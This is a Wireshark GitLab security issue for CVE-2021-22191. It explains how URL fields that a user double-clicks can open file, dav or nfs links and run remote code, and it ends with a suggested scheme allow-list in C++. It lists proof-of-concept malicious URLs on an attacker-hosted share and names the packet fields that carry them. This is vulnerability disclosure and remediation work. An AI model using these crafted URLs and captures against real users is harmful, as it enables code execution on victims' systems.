CVE-2021-22191: Code execution in Wireshark via non-http(s) schemes in URL fields (#17232) · Issues · Wireshark Foundation / wireshark · GitLab
Improper URL handling in Wireshark 3.4.0 to 3.4.3 and 3.2.0 to 3.2.11 could allow remote code execution via packet injection or a crafted capture file.
This issue was reported to [email protected] on 2021-01-19 but has not been acknowledged so far. The Xubuntu NFS variant was discovered after the original report and has been added here.
Description
Some fields in the Wireshark proto_tree are double-clickable and pass URLs with arbitrary schemes to the QDesktopServices::openUrl function. http and https URLs passed to this function are opened by the browser which is generally safe. For some other schemes like dav and file however, referenced files will be opened by the system’s standard application associated with their file type. By preparing internet-hosted file shares and executable files, arbitrary code execution can be achieved via malicious pcap(ng) files or captured live-traffic and some user interaction. Depending on which system and scheme/remote protocols are used, slightly different behaviors can be observed. Attached are two PoC videos:
1 - Windows: PoC_1_Windows
- Packet/dissector: DHCP option 114 (Captive Portal)
- Malicious URL: file:////posisec.com/DavWWWRoot/jartest.jar
- File executed: jartest.jar - pops up a swing dialog box
- System: Fresh Windows 10 install with Wireshark 3.4.2 and standard JRE installation
- Backend: Anonymous WebDav share hosted at dav://posisec.com/ (src-IP restricted)
- Behavior: The user opens the malicious pcap file and double-clicks the file URL. The WebDav share is mounted in the background, and the .jar file is executed.
2.1 - Xubuntu NFS: PoC_2_1_Xubuntu
- Packet/dissector: X509 Certificate authority info
- Malicious URL: nfs://posisec.com/export/malicious_cmnd.desktop
- File executed: malicious_cmnd.desktop - pops up an xmessage dialog
- System: Fresh Xubuntu install with Wireshark 3.2.3
- Backend: Anonymous NFS share hosted at nfs://posisec.com/ (src-IP restricted)
- Behavior: The user opens the malicious pcapng file and double-clicks the nfs URL. The NFS share is mounted in the background, and the .desktop file is executed.
2.2 - Xubuntu Webdav: PoC_2_Xubuntu
- Packet/dissector: X509 Certificate authority info
- Malicious URL 1: dav://posisec.com/
- Malicious URL 2: file:///run/user/1000/gvfs/dav:host=posisec.com,ssl=false/cmdx.desktop
- File executed: cmdx.desktop - pops up an xmessage dialog
- System: Fresh Xubuntu install with Wireshark 3.2.3
- Backend: Anonymous WebDav share hosted at dav://posisec.com/ (src-IP restricted)
- Behavior: The user first double-clicks malicious URL 1 which mounts the Anonymous WebDav share and opens up the file explorer. When the user double-clicks malicious URL 2, the foreign .desktop file is executed without an OS warning since the now mounted share is referenced via a local file path.
Note that there are more schemes (sftp, davs, smb, …) and payloads (.exe, .bat, …) that can be used to achieve slightly different behaviors. Also note that some ISPs or Access Point devices may block outgoing SMB traffic, preventing exploitation via internet-hosted SMB shares.
Risk
An attacker could distribute malicious capture files and entice people to inspect them. On Windows with a JRE installed, a single double-click on a crafted field is enough to cause code execution on the victim's system.
Mitigation suggestion
Add sanitization logic in ProtoTree::itemDoubleClicked to only allow whitelisted URL schemes (http, https).
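The suggested allow-list check, written out as an added example that is not Wireshark's own code: it assumes the field value arrives as a std::string and that the real Qt handler would compare QUrl::scheme() against the same list before calling QDesktopServices::openUrl.

```cpp
// Added example, not Wireshark's own code: a scheme allow-list that a handler such as
// ProtoTree::itemDoubleClicked could apply before handing a field value to
// QDesktopServices::openUrl. Takes the URL as std::string; in Qt the same check
// would compare QUrl::scheme() (already lowercased) against the allow-list.
#include <algorithm>
#include <cctype>
#include <iostream>
#include <string>
#include <vector>

// Extract the scheme per RFC 3986: ALPHA *( ALPHA / DIGIT / "+" / "-" / "." ) ":".
// Returns "" when the input has no syntactically valid scheme (scheme-relative
// "//host", leading whitespace, or a bare word without ':').
std::string urlScheme(const std::string &url) {
    if (url.empty() || !std::isalpha(static_cast<unsigned char>(url[0]))) return "";
    for (size_t i = 0; i < url.size(); ++i) {
        unsigned char c = static_cast<unsigned char>(url[i]);
        if (c == ':') {
            std::string s = url.substr(0, i);
            std::transform(s.begin(), s.end(), s.begin(),
                           [](unsigned char ch) { return static_cast<char>(std::tolower(ch)); });
            return s;  // lowercase so "HTTP:" and "http:" are treated alike
        }
        if (!(std::isalnum(c) || c == '+' || c == '-' || c == '.')) return "";
    }
    return "";
}

// Allow-list, not block-list: anything that is not exactly http or https is refused,
// which covers file, dav, nfs, smb, sftp and any scheme the desktop learns later.
bool isSafeToOpen(const std::string &url) {
    const std::string scheme = urlScheme(url);
    return scheme == "http" || scheme == "https";
}

int main() {
    // Constructed sample field values (hosts use the reserved .invalid TLD).
    const std::vector<std::string> samples = {
        "https://example.invalid/portal",
        "HTTP://example.invalid/",
        "file:////example.invalid/DavWWWRoot/x.jar",
        "dav://example.invalid/",
        "nfs://example.invalid/export/x.desktop",
        "//example.invalid/",
    };
    for (const auto &u : samples)
        std::cout << (isSafeToOpen(u) ? "open  " : "refuse") << "  " << u << '\n';
    return 0;
}
```

Refused URLs should still be shown to the user as plain text (or copied to the clipboard) rather than silently dropped, so the field remains inspectable.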
Edited Feb 12, 2021 by